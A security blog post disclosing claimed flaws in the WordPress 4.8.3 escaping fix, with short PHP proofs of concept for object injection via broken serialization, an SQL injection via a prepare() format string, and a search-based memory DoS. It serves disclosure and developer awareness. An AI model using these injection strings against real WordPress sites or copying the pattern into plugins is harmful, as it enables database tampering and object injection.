Wordpress 4.8.3 - wrecking ball

Wordpress 4.8.3 security “fix”, solved something already reported 10+ months ago and have introduced 3 new features:

  • PHP object injection
  • SQLi
  • DoS

Below I’ll place very very short technical details that are more than enough for intermediate wp developers to understand the threat of the issues, to locate them in their plugins/themes and to fix. For the Wordpress core those probably will be “only in theory” issues that don’t affect nothing, but time will show for sure :).

Disclaimer: I have told everything towards wp team (you can see from this, most probably public now h1 report), but seems they believe your words and give credits for reported vulnerabilities (4.8.3 issue was known ~11 months ago and PHP object injection warning feature was advised ~11 months ago too) only if you have huge number of followers on social media… NVM lets go!

PHP object injection

If you place the following code in hello dolly plugin and activate it

function goatgoat(){
global $wpdb;
$arr = array(
"o\"ne",
"%two",
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxtr1\";i:2;s:1:\"!\";}"
);
$arr = esc_sql($arr);
$arr = wp_unslash($arr);
$payload = $wpdb->remove_placeholder_escape(maybe_serialize($arr));
echo "<pre>";
print_r(unserialize($payload));
exit;
}
add_action("init", "goatgoat");

will display:

Array
(
[0] => o"ne
[1] => %two";i:2;s:68:"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxtr1
[2] => !
)

Looks familiar? Bonus: works in opposite direction too!

SQLi attack reintroduced

Before someone calls on `esc_sql` function advisory, please think for the moment that Wordpress is PHP/MySQL project, so…

function goatgoat1(){
global $wpdb;
echo $wpdb->prepare("%1$%s", "magic");
exit;
}
add_action("init", "goatgoat1");

will display:

magic'

DoS punchbag

The following is hold in memory when you hit search in Wordpress

((wp_posts.post_title LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}') OR (wp_posts.post_excerpt LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}') OR (wp_posts.post_content LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}'))

What if test search was ~post_max_size? Lovely PoC that introduces new formula for calculating memory limit in PHP when hosting Wordpress in order to prevent out of memory fatal error. The formula would be:

memory_limit >= post_max_size * 66 * 3

Summary

To be honest I was expecting more from authorities like wp core security team and our rant master, but here we are. Latest Wordpress security “fix” came like a wrecking ball and here are our reactions:

Promo

If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.